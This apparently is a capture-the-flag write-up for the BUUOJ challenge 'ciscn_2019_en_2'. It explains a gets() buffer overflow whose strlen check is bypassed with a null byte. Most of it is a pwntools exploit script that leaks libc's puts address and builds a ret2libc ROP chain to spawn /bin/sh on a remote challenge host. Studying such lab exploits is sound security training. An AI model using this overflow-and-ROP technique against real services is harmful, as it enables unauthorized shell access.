ciscn_ 2019_ en_ two

ciscn_2019_en_2

Title address : https://buuoj.cn/challenges#ciscn_2019_en_2

main function

It mainly displays and selects form options , according to 123 To perform option operations , The key is encrypt function

encrypt function

This function is the key utilization point
gets Infinite overflow ,strlen Check the length , But it can be \x00 Bypass , Then this function performs XOR on the input characters, which has no effect

But there is no backdoor function in the program , This requires us to disclose libc Medium system The address of the function and \bin\sh Address to construct rop

exp

from pwn import *
from LibcSearcher import LibcSearcher
io = process('./ciscn_2019_en_2')
io = remote("node4.buuoj.cn",29425)
elf = ELF('./ciscn_2019_en_2')
puts_plt_addr = elf.plt['puts']
puts_got_addr = elf.got['puts']
_start_addr = elf.symbols['_start']
pop_rdi = 0x0000000000400c83
ret = 0x00000000004006b9
payload = b'\x00'+b'a'*87+p64(pop_rdi)+p64(puts_got_addr)+p64(puts_plt_addr)+p64(_start_addr)
 
io.sendlineafter('Input your choice!\n','1')
 
io.sendlineafter('Input your Plaintext to be encrypted\n',payload)
io.recvline()
io.recvline()
#puts_addr=u64(io.recv()[0:8])
puts_addr=u64(io.recvuntil('\n')[:-1].ljust(8,b'\0'))
print hex(puts_addr)
#libc = LibcSearcher('puts',puts_addr)
#libcbase = puts_addr - libc.dump('puts')
#print libcbase
#system_addr = libcbase + libc.dump('system')
#binsh_addr = libcbase + libc.dump('str_bin_sh')
libc = ELF("libc-2.27.so")

offset = puts_addr - libc.symbols["puts"]
system_addr = libc.symbols["system"] + offset
binsh_addr = next(libc.search("/bin/sh")) + offset
payload = b'\x00'+b'a'*87 + p64(pop_rdi) + p64(binsh_addr)+p64(ret)+p64(system_addr)+p64(0)
io.sendline('1')
io.recv()
io.sendline(payload)
io.interactive()